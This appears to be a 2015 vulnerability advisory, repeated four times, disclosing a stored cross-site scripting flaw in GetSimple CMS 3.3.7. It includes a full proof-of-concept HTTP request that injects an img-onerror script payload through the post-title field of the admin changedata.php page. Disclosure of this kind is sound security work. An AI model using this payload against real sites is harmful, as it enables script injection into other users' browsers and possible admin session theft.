2015-12-06, 05:06:55
================================================================
GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability
================================================================
Information
--------------------
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)
Description
--------------------
GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
--------------------
1.Burp Request
POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374
nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates
2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Advisory Information:
================================================
GetSimple CMS XSS Vulnerability
Severity Level:
=========================================================
Med
Description:
==========================================================
Vulnerable Product:
[+] GetSimple CMS 3.3.7
Vulnerable Parameter(s):
[+] post-title
Affected Area(s):
[+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Credits & Authors
--------------------
Sachin Wagh (@tiger_tigerboy)
================================================================
GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability
================================================================
Information
--------------------
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)
Description
--------------------
GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
--------------------
1.Burp Request
POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374
nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates
2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Advisory Information:
================================================
GetSimple CMS XSS Vulnerability
Severity Level:
=========================================================
Med
Description:
==========================================================
Vulnerable Product:
[+] GetSimple CMS 3.3.7
Vulnerable Parameter(s):
[+] post-title
Affected Area(s):
[+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
For any questions related to this notification message - please contact on : wsachin092@gmail.com
Best Regards,
Sachin Wagh
GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability
================================================================
Information
--------------------
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)
Description
--------------------
GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
--------------------
1.Burp Request
POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374
nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates
2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Advisory Information:
================================================
GetSimple CMS XSS Vulnerability
Severity Level:
=========================================================
Med
Description:
==========================================================
Vulnerable Product:
[+] GetSimple CMS 3.3.7
Vulnerable Parameter(s):
[+] post-title
Affected Area(s):
[+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Credits & Authors
--------------------
Sachin Wagh (@tiger_tigerboy)
================================================================
GetSimple CMS – Version 3.3.7 – Cross-Site Scripting Vulnerability
================================================================
Information
--------------------
Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)
Description
--------------------
GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.
Proof of Concept URL
--------------------
1.Burp Request
POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374
nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates
2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
Advisory Information:
================================================
GetSimple CMS XSS Vulnerability
Severity Level:
=========================================================
Med
Description:
==========================================================
Vulnerable Product:
[+] GetSimple CMS 3.3.7
Vulnerable Parameter(s):
[+] post-title
Affected Area(s):
[+] http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/
For any questions related to this notification message - please contact on : wsachin092@gmail.com
Best Regards,
Sachin Wagh
